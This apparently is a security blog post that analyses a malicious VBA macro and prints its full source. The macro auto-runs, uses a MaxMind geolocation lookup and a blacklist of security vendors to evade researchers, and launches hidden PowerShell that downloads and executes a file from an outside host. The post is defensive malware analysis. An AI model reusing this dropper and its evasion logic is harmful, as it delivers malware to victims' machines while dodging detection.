.DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)
What's interesting or a bit different about this payload than others is that the attacker is trying to perform "Security Researcher Detection". Similar to how some malware performs VMWare Detection in order to disable itself if it's being run in a virtual machine, this malware is disabling itself if it's being run from within a security research coproration ip subnet. How? The attacker is actually pulling your geo location from maxmind.com
xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
and the attacker has a blacklist
Blacklist = Array( 'Return
"FORTINET", _
...
"TREND MICRO", _
...
"FIREEYE", _
and if for example it contained the text FIREEYE (a leading security research company)
then the malware would disable itself.
If BlacklistHit Then Error 102
So security researchers should be aware of code/attacks like this that may purposefully do nothing depending on how or where you run it from.
Edit: Mistakenly typed Powershell instead of VBA in title. It's VBA that calls powershell.
The code
Dim gContinue As Boolean
Public Sub InkPicture1_Painted(ByVal Param1 As Long, ByVal Param2 As IInkRectangle)
On Error GoTo x_Error
If gContinue Then Exit Sub
gContinue = True
ExecutePayload
Exit Sub
x_Error:
End Sub
Public Sub ExecutePayload()
If RecentFileCountTooLow Then Error 101
If BlacklistHit Then Error 102
Set WScriptShell = CreateObject("WScript.Shell")
WScriptShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)", 0
Exit Sub
End Sub
Public Function RecentFileCountTooLow() As Boolean
RecentFileCountTooLow = RecentFiles.Count < 3
End Function
Dim City As String
Public Function BlacklistHit() As Boolean
City = UCase(GetCity)
For Each Value In Blacklist
If InStr(City, Value) <> 0 Then GoTo InBlacklist
Next
Exit Function
InBlacklist:
BlacklistHit = True 'Return
End Function
Public Function Blacklist()
Blacklist = Array( 'Return
"FORTINET", _
"CISCO", _
"TREND MICRO", _
"RACKSPACE", _
"HOSTING", _
"STRONG TECHNOLOGIES", _
"DATA CENTER", _
"IRON PORT", _
"BLUECOAT", _
"BLUE COAT", _
"VMVAULT", _
"MESSAGELABS", _
"MICROSOFT", _
"MIMECAST", _
"LEASEWEB", _
"BLACKOAKCOMPUTERS", _
"ESET, SPOL", _
"SERVER", _
"DATACENTER", _
"BITDEFENDER", _
"DATACENTRE", _
"OVH SAS", _
"NFORCE", _
"TRENDMICRO", _
"ANONYMOUS", _
"CLOUD", _
"AMAZON", _
"HISPEED.CH", _
"HOSTED", _
"IRONPORT", _
"PALO ALTO", _
"PROOFPOINT", _
"SECURITY", _
"TRUSTWAVE", _
"FORCEPOINT", _
"DEDICATED", _
"HETZNER", _
"FIREEYE", _
"ZSCALER"
)
End Function
Public Function GetCity() As String
Set xmlHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
xmlHttp.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
xmlHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
xmlHttp.Send
If xmlHttp.Status <> 200 Then Error 201
GetCity = xmlHttp.ResponseText 'Return
End Function
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- DOM XSS 101 Walk-Through
- An Invoice email and a Hot mess of Java
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
No comments:
Post a Comment